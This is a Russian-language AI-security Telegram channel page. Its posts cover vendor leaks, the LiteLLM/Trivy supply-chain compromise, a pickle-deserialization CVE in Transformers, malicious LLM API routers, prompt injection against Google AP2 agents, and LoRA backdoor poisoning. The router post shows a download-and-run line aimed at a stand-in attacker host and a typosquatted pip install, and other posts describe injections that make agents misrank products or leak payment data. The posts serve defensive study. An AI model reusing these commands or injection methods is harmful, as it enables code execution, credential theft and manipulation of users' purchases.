PWN AI

Public

Просмотреть канал

Не можете присоединиться? @pwnai

6.4k Участники

Обновлено: May 26, 2026 at 11:46 PM

PWN AI

На 99% состоит из людей. Хроники о небезопасном ИИ. Не нравится? Смени телек. Не продамся вашей рекламе - никогда. "Мнение автора" != "Мнение компании, где автор работает". Папка с каналами по безопасности ИИ: https://t.me/addlist/KQ6ZpCqAO-I1NmUy

@pwnai is a dedicated channel for httpstmeaddlistkq6zpcqaoi1nmuy with regular updates in Стриминг и IPTV

Рейтинг

Глобальный рейтинг

#456

Рейтинг по языку

#45

Рейтинг по категории

#23

-1

Рост участников (Последние 11 дней)

Всего: 6.4K

Рост за 24ч: +119 2%

Последние посты

PWN AI

15 мая 2026 г., 23:34

Почему открытость не помогает

Вот в чём белое пятно. Открыт код - не значит открыт процесс. AI-продукты часто поставляются как npm-пакеты, исходники расписаны в release notes - но всё, что вокруг них, остаётся закрытым. Фиче-флаги, цепочка сборки, конфигурация CI, отношения с подрядчиками. Утекает именно эта прослойка.

Открытость работает против вендора. GitHub, реестры npm и pypi, HuggingFace Hub, публичные CDN, Pastebin, кэши поисковиков, Harbor-registry - все эти каналы регулярно хватают то, что не должно было выйти. Подавляющее большинство находок идёт именно отсюда. Не из взломов.

Кто этим занимается

Жанр оформился в самостоятельную дисциплину со своим сленгом («model archaeology»), репутационными механиками и инструментарием. Интересно, но даже по такой дисциплине уже можно сформировать перечень полезных источников:

- https://x.com/testingcatalog - часто ловит преданонсные фичи OpenAI и Google через черновики GitHub-блогов и строки кода в ChatGPT.
- https://t.me/AILeaksAndNews, https://t.me/btibor91, https://t.me/apples_jimmy, https://t.me/legit_rumors - твиттер-аккаунты, которые регулярно публикуют находки.
- Сообщества https://discord.gg/D4vEUhf9Bc и http://discord.com/invite/devmode - Discord-комьюнити, где боты регулярно публикуют находки.

Тут важно понимать, что это не атака на организации, а зеркало для них. Смотреть в него не любят: видно неприятное. Можно заковать веса в железобетон и держать редтим отчёты под NDA, но, если у тебя криво написан .npmignore - это всё равно что хранить золото в бронированном сейфе с приоткрытой крышкой.

1,050

PWN AI

15 мая 2026 г., 23:34

📷 Photo

В этом году мои хорошие знакомые из Авилликс проводят 4й Pentest Award.

Я уже в канале о том, как я был там 2 года назад. Прошлый год тоже был на высоте. Но в этом году ребята сделали отдельную номинацию для исследований по безопасности ИИ.

Очень надеюсь, что для вас мой пост станет некой отправной точкой, чтобы сделать исследование и показать его на церемонии.

https://award.awillix.ru/ 12 июля, а уже 14 августа именно вы можете оказаться на блистательной церемонии награждения.

1,390

PWN AI

15 мая 2026 г., 23:34

📷 Photo

Между CVE и джейлбрейками: ничейная зона утечек GenAI

GenAI - одна из самых открытых отраслей в IT за последние десять лет. Веса публикуются на HuggingFace, обучающие датасеты выкладываются под лицензиями, ассистенты для разработчиков поставляются как обычные npm-пакеты, LMArena работает как публичный полигон, где можно сравнить модели до их официального анонса. И тем не менее именно вокруг этой отрасли за последние полтора года сложился целый жанр OSINT - методичный поиск того, что вендоры хотят держать закрытым.

Если пройтись по тому, что утекало за последние полтора года, картина повторяется. Большинство утечек, как и в классической кибербезе - не взлом. Это ошибка конфигурации на открытой инфраструктуре. И белое пятно здесь возникло ровно потому, что классический AppSec считает такие случаи не своей зоной ответственности (это же не CVE), а компании, которым интересна безопасность ИИ заняты джейлбрейками, промпт-атаками и тем, как защитить AI-агентов – то есть находятся там, где есть академические публикации и доклады на конференциях. А прослойка между ними - неправильные конфигурации в CMS или репозиториях с пакетами - остаётся ничьей.

Что именно утекает

За абстрактной "утечкой модели" обычно стоит шесть разных вещей, и их полезно различать.

Веса и архитектуры. Главный исторический случай - LLaMA в марте 2023, когда https://www.theverge.com/2023/3/8/23629362/meta-ai-language-model-llama-leak-online-misuse с внутреннего канала Meta через 4chan. После этого крупные лаборатории закрыли веса целиком, и сейчас вытащить именно их практически невозможно. Поэтому современные утечки устроены иначе: уходит не сама модель, а вся обвязка вокруг неё - код продукта, в который она встроена, системные промпты, кодовые имена, пресс-материалы. Дальше - про каждый из этих типов отдельно.

Кодовые имена и продуктовые линейки. Самый ходовой артефакт. В коде десктопных приложений, в JSON-конфигах SDK, в pricing.json, в строковых константах фронтенда лежат имена будущих моделей за месяцы до релиза. По ним сообщество и восстанавливает планы вендоров. Те же кодовые имена потом всплывают на LMArena как анонимные слоты: summit оказался GPT-5, серия maskingtape/gaffertape/packingtape вышла как GPT Image 2, Nano Banana - это Gemini 2.5 Flash Image.

Системные промпты и описания инструментов. Самый показательный случай - дамп x1xhlol в апреле 2025: больше 6500 строк боевых промптов из v0, Cursor, Manus, http://Same.dev/, Lovable, Devin, Replit Agent. https://github.com/x1xhlol/system-prompts-and-models-of-ai-tools за пару недель собрал больше 12 тысяч звёзд на GitHub. По сути, это разбор продуктовой логики целого поколения AI-агентов: какие инструменты подключены, в каком порядке вызываются, какие ограничения прописаны на уровне системного промпта.

Драфты пресс-материалов. Через небезопасно настроенную CMS. В марте 2026 Fortune https://fortune.com/2026/03/26/anthropic-leaked-unreleased-model-exclusive-event-security-issues-cybersecurity-unsecured-data-store/ незащищённое хранилище Anthropic примерно с тремя тысячами файлов: черновики блог-постов, описания готовящихся релизов, детали закрытого саммита для корпоративных клиентов в Европе. Тип атаки тривиальный - обращение к CMS-эндпоинту, у которого забыли включить аутентификацию. Именно так уходит большая часть пресс-материалов и ранних маркетинговых текстов до официального анонса.

Source maps в продакшне. Самый технически красивый случай. 31 марта 2026 исследователь Chaofan Shou нашёл в npm-пакете @anthropic-ai/claude-code v2.1.88 59,8 МБ файлов .map. Из них восстановились 512 тысяч строк исходников на TypeScript. Причина - баг в бандлере Bun: он оставлял source maps в боевой сборке. Anthropic к этому моменту уже купила Bun, так что компанию подвёл её же собственный инструмент. В исходниках нашли архитектуру защит, внутренние инструменты разработки, неизвестные фиче-флаги и недокументированные функции.

Превью-серверы и модели на аренах. Вендоры поднимают тестовые серверы для будущих моделей по тем же URL-шаблонам, что использовали раньше. Угадать адрес можно за пару часов - без всякого взлома, просто перебором поддоменов. С моделями на LMArena логика похожая. Только опознают их не по URL, а по поведению: стиль отказов, привычки в форматировании, манера аргументации.

PWN AI

15 мая 2026 г., 23:34

Читаем! Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain
(По мотивам трека Дэвида Гетты)

Большинство LLM-агентов используют API-роутеры (например, LiteLLM, OpenRouter), которые по дизайну являются MITM и видят вообще все: промпты, tool calls, API-ключи, ответы и знают, что ты делал этим летом.

👉 В свежей https://arxiv.org/pdf/2604.08407 авторы проанализировали 28 платных роутеров и 400 бесплатных и получили следующие результаты: 9 роутеров внедряли вредоносный код, 17 — перехватывали креды (AWS, API keys), а один вообще реально украл ETH!

🤩 Основные атаки
1⃣ Payload injection
Роутер меняет tool call:
# было

curl https://safe.com/install.sh | bash

# стало

curl https://attacker.sh | bash
Агент выполняет и всё, у тебя RCE.

2⃣Secret exfiltration
Вообще ничего не меняется, просто читаются API-ключи, сохраняются и используются позже. Блаженно твое неведение.

3⃣ Dependency hijacking
Самое коварное
pip install requests
↓
pip install reqeusts
Выглядит нормально? А это вредоносный пакет.

4⃣ Conditional attacks
Атака включается только после 50 запросов, только в YOLO mode и только для Rust/Go проектов. А тесты ничего не находят.

Полезно иногда проверять, через какие сервисы реально проходят ваши запросы.

Все
🍔

TL;DR
Если ты используешь LLM-агентов с tool calling:
😭 ты в supply chain
😭 ты доверяешь посредникам
😭 и зря

1,510

PWN AI

15 мая 2026 г., 23:34

RCE в HuggingFace Transformers через чекпоинт

В уязвимости https://nvd.nist.gov/vuln/detail/CVE-2026-1839 проблема скрыта в операции восстановления состояния генератора случайных чисел внутри Trainer. При resume обучения библиотека загружает файл rng_state.pth, используя torch.load() из PyTorch.

До версии 5.0.0rc3 загрузка происходила без ограничения weights_only=True, а значит 🤡 через стандартный pickle-механизм, который по своей природе способен выполнять произвольный код при десериализации ( https://cwe.mitre.org/data/definitions/502.html).

Механизм атаки
➖ Trainer при возобновлении обучения должен восстановить всё состояние процесса:веса модели, learning rate scheduler, состояние генератора случайных чисел (чтобы последовательность случайных чисел при продолжении обучения была такой же, как если бы обучение не прерывалось) и тд.

➖ Для сохранения состояния RNG библиотека transformers создаёт файл rng_state.pth. Это просто файл, куда http://torch.save/() записывает текущее состояние генератора.

➖ Проблема в методе загрузки. Чтобы загрузить состояние обратно, используется torch.load(). Вот код из уязвимой версии (упрощённо):

with safe_globals([torch.random.get_rng_state]):
rng_state = torch.load(rng_state_path) #здесь всё и ломается идет не по плану

Если файл подменён, то 🧑‍💻внутрь можно положить объект с __reduce__, который выполнит произвольный код при torch.load().

Коварно то 😈, что разработчики попытались обернуть загрузку в safe_globals(), но в версиях PyTorch ниже 2.6 это не сработало: контекст просто превращается в nullcontext, т.е. защита фактически отсутствует.

Уязвимости через небезопасную десериализацию регулярно всплывают в ML. 😓 В Python-экосистеме это старая проблема, ведь pickle никогда не был безопасным форматом. 💩 Аналогичные истории уже происходили, например, в других частях Transformers (в TensorFlow-утилитах), где также использовалась небезопасная загрузка. Похожие классы уязвимостей встречаются и за пределами ML (но об этом в других каналах хаха 🌝).

В мире ML есть дополнительный фактор риска, так как чекпоинты активно распространяются и переиспользуются. Люди скачивают модели с форумов, из GitHub да отовсюду, не задумываясь о том, что файл .pth — потенциально исполняемый объект.
Фикс в CVE-2026-1839 👌 минималистичен, просто добавили weights_only=True, которое ограничивает десериализацию и блокирует выполнение произвольного кода. Но важен 👇

Вывод
Любая загрузка состояния в ML должна рассматриваться как недоверенный ввод. И если библиотека этого не делает по умолчанию, повод задуматься об ошибке всего мл-пайплайна.

Что еще хочется сказать разработчику мл-библиотек?
🤘 Никогда не используй torch.load() (и аналоги в TensorFlow: tf.keras.models.load_model) без weights_only=True для пользовательских файлов.
✌️ Всегда рассматривай любой загружаемый файл (модель, конфиг, чекпоинт) как недоверенный ввод.
👑 Внедряй проверки целостности (например, цифровые подписи) для официальных чекпоинтов (да и не для официальных, потому что дисциплина в этом деле очень важна!).

P. S. Уточню, что формат https://huggingface.co/docs/safetensors/index (разработанный Hugging Face) изначально безопасен, так как не выполняет код.

Все
🤘

PWN AI

15 мая 2026 г., 23:34

великолепный пост, но в ближайшее время ждите и от меня интересного !!!!!

1,420

PWN AI

15 мая 2026 г., 23:34

📷 Photo

Миф о закрытом доступе: как Claude Mythos утёк в день анонса

7 апреля 2026 года Anthropic объявляет https://www.anthropic.com/glasswing и https://red.anthropic.com/2026/mythos-preview/ модель Claude Mythos Preview. Сорок организаций. Apple, Google, Microsoft, JPMorgan, Nvidia, Linux Foundation. $100M в виде токенов для компаний. В тот же день модель уже крутилась у тех, кого в списке Glasswing не было.

История не началась 7 апреля. Она началась в феврале, в чужом CI-пайплайне, и к Anthropic отношения не имела вообще.

Всё стартовало с классической ошибки конфигурации в CI у Aqua Security. В пайплайне Trivy использовался триггер pull_request_target - он запускал код из форкнутого пул-реквеста с правами родительского репозитория. Про эту ловушку пишут с 2021 года, но про неё регулярно забывают. Через неё автономный бот hackerbot-claw утащил приватный токен сервисного аккаунта aqua-bot. В конце февраля Aqua обнаружила инцидент и начала ротацию, но сделала её не до конца. За несколько дней, пока креды ещё работали, злоумышленники из TeamPCP успели выгрузить новые ключи.

19 марта, 17:43 UTC - атакующие переписывают 75 из 76 тегов trivy-action и все 7 тегов setup-trivy на коммиты с заражёнными артефактами. Внешне ничего не меняется: пользователь запускает сканирование, оно работает как обычно, а параллельно малварь вычитывает секреты из памяти раннера.

24 марта, 10:39 UTC - CI/CD LiteLLM подтягивает скомпрометированный Trivy из официального источника без привязки к конкретной версии. Подменённый Trivy достаёт токен для публикации в PyPI, и в индекс улетают litellm==1.82.7 и 1.82.8. В версии 1.82.8 злоумышленники https://futuresearch.ai/blog/litellm-pypi-supply-chain-attack/ .pth-файл - это обычный файл (34 628 байт), который Python автоматически исполняет при каждом запуске интерпретатора. Без import. Без явного вызова. Просто запускаешь питон - и из окружения вытекают все ключи: SSH, AWS, токены от других сервисов. LiteLLM https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign в 36% облачных окружений. Пакет провисел в PyPI около двух-трёх часов до карантина. Этого хватило.

В улове https://repello.ai/blog/mercor-lapsus-litellm-breach креды Mercor - стартапа, который поставляет тренировочные данные OpenAI, Anthropic и Meta. 31 марта за дело берётся уже Lapsus, не TeamPCP. Это другие люди, и тут важный нюанс: публичного подтверждения сговора между ними нет. TeamPCP собирает всё подряд, Lapsus точечно выбирает из собранного то, что интересно им. Результат - 4 ТБ данных Mercor, включая 939 ГБ исходного кода, видеозаписи интервью, KYC-документы 40 000+ подрядчиков. И, критически для нашей истории, - материалы о процессах оценки клиентов Mercor, в том числе URL-паттерны тестовых окружений Anthropic.

Параллельно Anthropic делает два собственных самострела. 26 марта Fortune https://fortune.com/2026/03/26/anthropic-says-testing-mythos-powerful-new-ai-model-after-data-leak-reveals-its-existence-step-change-in-capabilities/, что внешние исследователи из LayerX Security и Кембриджа обнаружили в публично доступном CMS компании около трёх тысяч неопубликованных материалов, включая черновик анонса с именами модели - "Mythos" в одной версии и "Capybara" в другой (внутреннее имя нового тира, стоящего над Opus). 31 марта - https://www.infoq.com/news/2026/04/claude-code-source-leak/ Claude Code через .map-файл, случайно попавший в npm-пакет версии 2.1.88. Около полумиллиона строк TypeScript, порядка 1900 файлов, в коде - имена моделей всего семейства и фрагменты внутреннего роадмапа.

К 7 апреля у закрытой группы в частном Discord-сервере есть всё: имя модели, внутренний тир, техническое описание, паттерны URL из Mercor-дампа. Остаётся последний сегмент. Его угадывают.

Теперь про само движение. Это не хакеры и не APT. Это сообщества AI-сыщиков, тихо автоматизировавшие разведку по передовым компаниям, которые разрабатывают модели. Боты, непрерывно проверяющие GitHub, npm, CDN, описания вакансий. Мониторинг коммитов с рабочими названиями. Анализ сигнатур ответов API на LMArena для деанонимизации скрытых моделей. Культура триангуляции по метаданным.

Публичное крыло движения безобидно и в чём-то даже полезно. Именно они отождествили summit с GPT-5, Nano Banana - с Gemini 2.5 Flash Image, раскусили maskingtape, gaffertape и packingtape как варианты GPT-Image-2. Движение существует годами и питается инженерным тщеславием: кто-то в Google постит эмодзи банана без контекста - и дальше всё раскручивается само.

PWN AI

15 мая 2026 г., 23:34

Но есть и закрытое крыло. Меньше, тише, с дисциплиной оператора. С ботами, которые не просто читают публичные каналы, а ведут энумерацию URL. С готовностью использовать инсайдеров. В случае с Mythos этот инсайдер нашёлся. Bloomberg https://techcrunch.com/2026/04/21/unauthorized-group-has-gained-access-to-anthropics-exclusive-cyber-tool-mythos-report-claims/, что человек с легитимным preview-доступом через стороннего подрядчика передавал группе учётные данные или, как минимум, помогал ориентироваться в preview-среде. Формально - не сотрудник Anthropic. Фактически - человек из доверенного периметра. Со слаженностью такого уровня, что, получив доступ к Mythos, они сознательно не запускают на нём атак - чтобы не попасть в детекторы Anthropic. Вместо этого на модели генерируют простые сайты, мимикрируя под настоящих preview-пользователей. Источник Bloomberg подтверждает: доступ у группы есть не только к Mythos, но и к другим невыпущенным моделям Anthropic.

Это уже threat actor в нормальном смысле. Без имени, без атрибуции, с продемонстрированной способностью удерживать доступ четырнадцать дней до раскрытия и инициировать это раскрытие самим - через слив в Bloomberg, а не через детекцию со стороны защитника.

Красивый парадокс всей истории в том, что Anthropic выстраивал Glasswing как контролируемый периметр. Сорок доверенных партнёров, усиленные SLA, NDA, $4M в защитный open-source-инструментарий. Периметр действительно выдержал на уровне собственной инфраструктуры компании. Но периметр никогда не заканчивается там, где заканчивается твоя серверная. Он заканчивается там, где заканчивается дисциплина у подрядчика твоего партнёра.

Или у CI-пайплайна в сканере уязвимостей, о котором ты даже не слышал.

2,220

PWN AI

15 мая 2026 г., 23:34

📷 Photo

False Positive Community: обзор BitGN PAC1
22 апреля, 18:30 – 20:00 (GMT+3)

Всем привет!

Соберемся, обсудим прошедшее соревнование https://bitgn.com/l/pac1-accuracy задачи и решения участников нашего хаба False Postitive!

Разберем:
- PAC1 - что это за соревнование?
- При чем тут фишинг и промпт-инъекции
- TOP-20 решение общего рейтинга
- и TOP-4 решения хаба False Positive
- Что докрутили на late-submission и впечатления от соревы

Ссылка для подключения:
https://ptsecurity.ktalk.ru/u9cft2ptphoo

Календарный файл в комментах 🔽

1,590

PWN AI

15 мая 2026 г., 23:34

📷 Photo

Как промпт-атаки заставляют Google AP2 подписывать не то, что хотел пользователь.

Защита агентных платежей в Google AP2 построена на криптографии, а ломается на уровне естественного языка. Достаточно дописать пару инструкций в описание товара, и Merchant Agent выведет его первым в выдаче, а пользователь добросовестно подпишет мандат на покупку именно того, что нужно атакующему. Исследователи описывают эту схему в статье " https://arxiv.org/abs/2601.22569" и показывают две атаки на рабочем прототипе AP2.

Google AP2 вводит три подписанных мандата (Intent, Cart, Payment) поверх A2A и MCP. Протокол заявляет три свойства: authorization, authenticity, accountability.

Подпись ставится в конце цепочки, а до неё работает LLM, которая читает внешние данные и формирует намерение пользователя. Именно здесь возникает зазор.

1. Branded Whisper Attack.
Атакующий действует как недобросовестный продавец и встраивает инструкции прямо в описание товара. Merchant Agent на Gemini-2.5-Flash подгружает описания в свой контекст, не отделяя данные от команд, и ставит товар атакующего первым в выдаче вне зависимости от релевантности и цены. Пользователь видит «лучший вариант», подтверждает его и подписывает Cart Mandate. С точки зрения криптографии всё корректно, протокол считает транзакцию честной.

2. Vault Whisper Attack.
Механизм тот же, но цель другая. Через инъекцию в контекст агента атакующий вытягивает конфиденциальные данные пользователя: платёжные реквизиты, адреса, токены.

Оба сценария затрагивают одно и тоже. AP2 гарантирует, что подписанное намерение будет исполнено без подмен, но не гарантирует, что подписанное намерение совпадает с реальным намерением пользователя. Между получением данных и подписью работает LLM, и именно она становится новой точкой доверия, которую мандаты не закрывают.

Меры, которые предлагают авторы (проверка входных данных от продавца, изоляция контекста агента, мониторинг и обнаружение промпт-атак), ничем не удивляют. Важнее сам вывод. Проблема не в том, что подписи бесполезны, а в том, что подписывается вход, которому не стоит доверять.

Решение лежит не в усилении криптографии и не в её замене, а в архитектуре самого агента: как он отделяет инструкции пользователя от данных продавца, как ограничивает влияние полученного контента на ранжирование, как разграничивает доступ к конфиденциальным полям. AP2 задаёт правильный каркас, но без этих гарантий на уровне агента каркас остаётся пустым.

https://github.com/wearetyomsmnv/awesome-agentic-payments - тоже зацените.

PWN AI

6 апр. 2026 г., 07:36

📷 Photo

Безопасность LoRA-адаптеров
#иб_для_ml

https://arxiv.org/abs/2106.09685 (2021) - технология дообучения GenAI-моделей (из семейства PEFT), при которой изменения хранятся в виде отдельного подключаемого адаптера (матрицы весов) при фиксированных базовых весах. Хоть самая https://arxiv.org/abs/1902.00751 появилась раньше (2019), но именно с появлением LoRA она распространилась.

Сила этой технологии в масштабируемости для разрозненных команд. Когда одна команда отвечает за сервисы базовых моделей, и множество команд придумывает свои приложения или агентов, возникает задача потоковым образом предоставлять специфично дообученные модели под разные задачи бизнеса.

И здесь как раз себя показывает LoRA. Продуктовая команда собирает датасет, и грузит свои размеченные данные для дообучения. Для выбранной базовой модели создается LoRA-адаптер. На выходе для пользователя видно только новое название в поле "модель", дающее доступ к результату дообучения. Это работает, так как с технической стороны, LoRA позволяет для одной отдельно взятой LLM в проде быстро менять адаптеры, как перчатки, в зависимости от поступающих запросов.
И с ростом такого "конвейера" LoRA-адаптеров стала появляться новая поверхность атаки, эксплуатирующая особенности подключения кусочков модели к основному файлу весов.

📷Поговорим про топ-3 классов угроз для LoRA

1⃣Отравление данных обучения: вроде бы обычная история отравления, с LoRA приобретает несколько особенных граней. Стандартный способ атаки модифицируется - например, отравляются несколько наборов данных, и, соответственно несколько наборов адаптеров. Это делается для того, чтобы только в комбинации такие адаптеры давали вредоносный эффект бэкдоров. ( https://arxiv.org/html/2403.00108v1)
Помимо этого, особенностью также является легкость внедрения поверхностных знаний в модель ( https://arxiv.org/abs/2403.00108). Так, существует работа, показывающая, что с помощью отравления LoRA можно обучить модель стеганографически сливать небольшие сообщения через ответы. ( https://arxiv.org/abs/2505.20118)

2⃣ Хирургия весов: самый показательный экзотический вариант - срезание FF-слоя (feedforward): подмена только MLP-компоненты в легитимном адаптере на такую часть отравленного дает почти полный перенос бэкдор-знаний при минимальных изменениях прикладной эффективности. Туда же - техника "сплайсинга": FF берётся из одного адаптера, части матриц внимания (Q/K/V/O) — из другого (матрицы отравленные), внешне получается почти тот же артефакт. ( https://arxiv.org/html/2403.00108v1)

3⃣: Из LoRA тоже могут утекать данные: есть работа, где показано, что по данным обучения адаптеров также можно осуществить восстановления наличия записи в датасете обучения (membership inference - https://arxiv.org/abs/2507.18302).

📷Конечно, не забудем и про меры защиты LoRA

🔓 На этапе проектирования и формирования цепочки поставок: единый реестр и управление доступом к адаптерам и их комбинациям, обязательная связь с наборами данных (подпись происхождения), безопасный формат файлов, отслеживание хэшей тензоров для обнаружения “смешивания” тензоров между несколькими адаптерами.

🗃 На этапе обучения: обязательные проверки загружаемых данных (ПДн, секреты и технические учетные данные), оценка признаков отравления данных, "слепая" предобработка для нарушения паттернов потенциальных отравляющих инъекций.

📷 На этапе эксплуатации: на самом деле, базовые меры для AI-агентов сегодня, то есть DLP на ответах, гардрейлы, регулярный red teaming новых адаптеров и их комбинаций. Из необычного можно попробовать реализовать анти-стеганографическую проверку. По реагированию - быстрый отзыв ручки с адаптером при выявлении компрометации данных или самого файла весов адаптера.

Но можно сказать, что пока что все это больше пугалки, чем денежные угрозы. Заниматься сейчас безопасностью LoRA есть смысл только в двух случаях: в крупном энтерпрайзе при использовании с чувствительной информацией, и при развитии собственной лаборатории безопасности ИИ. Во втором случае это полезно потому, как, возможно, в будущем появится больше "конструируемых" моделей на лету. И об этом говорят такие работы, https://arxiv.org/abs/2402.11455, https://arxiv.org/abs/2402.15896, https://arxiv.org/abs/2311.03285.

PWN AI

6 апр. 2026 г., 07:36

🎥 Video

2,070

PWN AI

6 апр. 2026 г., 07:36

📷 Photo

Дистилляция — инструмент прокачки или вектор утечки?

Дистилляция модели — вид обучения новой, более легковесной модели, при котором используются знания другой, обычно громоздкой модели (или нескольких). При таком подходе мы, как правило, почти не теряем в точности по сравнению с исходной моделью, но получаем более быструю и зачастую лучше обобщающую модель.

В работе https://arxiv.org/abs/1503.02531 как раз и вводится понятие дистилляции. В экспериментах используется классификатор изображений из датасета MNIST. Интересно, что дистиллированную модель удалось с высокой точностью научить распознавать цифру "3", даже после удаления из обучающей выборки примеров с этой цифрой. В работе для обучения используются soft-таргеты — распределение вероятностей, а не только метка таргет-класса.

Несмотря на это, в последнее время понятие дистилляции все чаще употребляется в немного другом смысле — когда речь идет об обучении на парах "запрос — ответ". Именно так термин используется в https://www.anthropic.com/news/detecting-and-preventing-distillation-attacks Anthropic.

Если коротко, то по заявлению самих Anthropic, были обнаружены признаки массовой генерации ответов через API, нетипичные для обычного пользовательского поведения. Под подозрение попали три конкурента в области AI — DeepSeek, Moonshot AI (Kimi) и MiniMax. По данным публикации, было задействовано около 24 тысяч фейковых учетных записей и собрано порядка 16 миллионов пар "запрос — ответ".

Определить причастность удалось по следующим признакам:
▸ совпадение платежных данных (думаю, что тут было проще всего спалиться)
▸ пересечение сетевых отпечатков (сбор фингерпринтов)
▸ схожие паттерны при взаимодействии с API (поведенческий анализ)

А вообще запрещено ли такое использование?
Теперь уже точно запрещено — в пользовательских соглашениях можно встретить следующие формулировки:
▸ "For example, you may not: ... Use Output Data to develop models that compete with OpenAI." — у OpenAI https://openai.com/ru-RU/policies/row-terms-of-use/
▸ "We prohibit customers from using our services to train or develop AI models without our written permission." — у Claude https://support.claude.com/en/articles/12326764-can-i-use-my-outputs-to-train-an-ai-model

А как технически с этим бороться?
В своей публикации Anthropic говорят, что приложат большие усилия для предотвращения подобных сценариев и предлагают следующие контрмеры:
▸ усиленный мониторинг трафика (на основе нескольких различных поведенческих классификаторов)
▸ усложнение процессов верификации для учебных аккаунтов и для исследователей по безопасности (наиболее часто абьюзились злоумышленниками)
▸ и некоторые другие защитные меры на уровне приложения и самой модели
▸ сотрудничество с другими AI-лабораториями и компаниями для обмена информацией (по сути, для Threat Intelligence)

В заключительной части публикации Anthropic призывает AI-индустрию к координации усилий и совместной работе для предотвращения дистилляции моделей. На мой взгляд, это фундаментально сложная задача — пока можно лишь повышать стоимость и снижать эффективность попыток дистилляции.

А стоит ли вообще запрещать подобные практики?

PWN AI

6 апр. 2026 г., 07:36

📷 Photo

Всем привет)
Я опять на конфе, но на этот раз не в России)

Кто тоже сегодня на SIGN China, пишите 😁

Или хотя бы в Китае)

1,910

PWN AI

6 апр. 2026 г., 07:36

https://t.me/poxek_ai написал интересную статью на Хабр про то, как AI-агент сам решает обойти этические ограничения ради KPI. Особенно доставляет Gemini - строго осуждает нарушения у других, но сама нарушает в 71% случаев.

https://habr.com/ru/companies/bastion/articles/995322/

2,480

PWN AI

6 апр. 2026 г., 07:36

📷 Photo

OpenClaw моего мозга

Сразу говорю - это пост не о его безопасности. Об этом «на волне» угроз стало столько публикаций, что писать о небезопасности уже нет смысла. Если хотите использовать его супер-безопасно - лучший вариант не ставить его совсем. И тем не менее.

Мне понравился OpenClaw в первую очередь тем, что я могу быстро реализовать идеи в формате скиллов. Описываю задачу Claude, получаю скилл, заливаю его прямо в OpenClaw - и через полчаса идея уже работает на меня.

Уже решил несколько задач. Сделал скилл, который отсматривает alignment-форумы на алерты по новым топикам - отслеживает, что комментируют топовые AI-safety исследователи, вытаскивает их цепочки вопросов и ответов. Раньше я бы это делал руками, листая бесконечные треды. Сделал скилл-прогнозиста, который мониторит интернет по моим конкретным событиям: насколько мы близко к тому, чтобы пузырь лопнул, выстрелит ли тема с платёжными агентами. Нет, я не делаю ставки на Polymarket - просто интересно. Но мне честно лень было бы делать эту работу каждый день, а скиллы её решают. Ну это далеко не всё что я сделал, конечно. Есть даже скилл который смотрит что нового там на grayswan по ctf-задачам.

Про деньги. На Kimi Pro за неделю активного использования ушло около $0.2. Двадцать центов - это не опечатка. Kimi ещё и идеально подходит, если не хотите блокировок по API. С Claude некоторые задачи могут быть отказаны, думаю, по понятным причинам. Opus 4.6 тоже пробовал - мощнее, но дороже и со своими ограничениями.

Настроить сам OpenClaw несложно. А вот скиллы - тут начинается настоящая работа. Когда пишешь их через Claude, нужно хорошее описание того, чего хочешь: что ожидаешь, в каком формате, какие библиотеки использовать. Чем точнее опишешь - тем меньше потом переделываешь. Порог для реализации, как правило, низкий, но иногда приходится запариваться - переделывать скилл, чтобы он правильно работал с зависимостями или чётко следовал формату вывода. Я даже переделал встроенный skill-creator, чтобы он уточнял детали и стремился к более верной стратегии.

Чего не хватает - так это нормальной работы с несколькими скиллами одновременно, синхронизированными в одном контексте. И порой скиллы реализуют задачу не так, как задано. Да и хочется чтобы он был более эмбиентным.

Почему не Claude Code, не Cursor, не свои скрипты? Потому что OpenClaw быстрее для точечных задач. Проверить неоднозначную гипотезу, закрыть что-то, что не требует большой разработки, - он именно этим ценен. И главное - с любого девайса. Не заменит он полноценную разработку, стоит воспринимать больше как протез для ленивого мозга, который хочет автоматизировать всё, что можно.

Нужен, правда, нормальный сервер, который не жалко засорить скриптами и зависимостями. Считайте это жертвоприношением богам автоматизации.

PWN AI

6 апр. 2026 г., 07:36

Некоторые знают что в шапке канала я постоянно держу ссылку на замечательную папку каналов

Я рекомендую вам подписаться, ребята делают много интересного в своих каналах по теме AI Security

🦸‍♂️🦸‍♂️🦸‍♂️🦸‍♂️🦸‍♂️ https://t.me/addlist 🦸‍♂️🦸‍♂️🦸‍♂️🦸‍♂️🦸‍♂️

Например, недавно мне понравились следующие посты:

https://t.me/okmlai - про большую проблему NotebookLLM, которая приводит к крашу всей системы.
https://t.me/offensive_thread - про бенчмарк от Wiz для оценки способностей агентов в кибербезопасности.
https://t.me/ml_ops - некоторая статистика по MlSecOps, о которой нельзя уже молчать.

Если не сложно, прошу вашего репоста папки. Спасибо

3,340

PWN AI

6 апр. 2026 г., 07:36

Привет. Мы с известными вам авторами каналов по AI Security решили провести стрим по AI Security. Кто будет: Евгений Кокуйкин - @kokuykin Борис Захир - @borismlsec Владислав Тушканов - @llmsecurity И вы. Запись будет, но лучше конечно же в лайфе. Хотели…

3,300

PWN AI

6 апр. 2026 г., 07:36

📷 Photo

🐉 Открыт набор на Technical AI Safety курс по оценке LLM: подходы, бенчмарки и методология

Evals for AI Safety — это методология измерения качества, надежности и безопасности ИИ-систем. В условиях повсеместного внедрения языковых моделей в продакшн умение корректно оценивать их возможности и риски становится приоритетным навыком.

Как устроен курс:
🔘Анализ методологии evals на основе современных и классических статей в области
🔘Менторы из Apollo research, AI Lab SKOLKOVO, AIRI Institute, Яндекс и др
🔘Обучение в мини-группах, по 4-6 человек
🔘Формат: оффлайн в Москве или онлайн
🔘Ожидаемая нагрузка: 10-15 часов в неделю
🔘Стоимость: бесплатно, отбор на конкурсной основе

Цель курса:
Дать базу для начала карьеры в области оценки ИИ и понимание того, какую роль evals играет в AI Safety. Программа знакомит с основными концепциями evals, учит анализировать существующие бенчмарки, проектировать собственные оценки и разрабатывать дизайн экспериментов в области evals. Участники курса освоят Inspect AI (один из самых популярных фреймворков для оценки LLM).

Кого мы ждем:
🔘Студентов STEM-направлений, планирующих карьеру в области ИИ
🔘IT-специалистов, желающих освоить навык тестирования языковых моделей
🔘Продвинутых и начинающих специалистов в области ML, которые хотят углубиться в методологию оценки моделей

Подробнее: https://monoid.ru/events/course-safety-evals-2026
Подать заявку на участие в курсе, а также на фасилитацию можно до 22 февраля: https://forms.yandex.ru/cloud/696e1c5ae010db8191425b7c

Если вам интересно менторство, преподавание, сотрудничество с курсом или вы хотите задать вопрос, то напишите https://t.me/june27kim

PWN AI

6 апр. 2026 г., 07:36

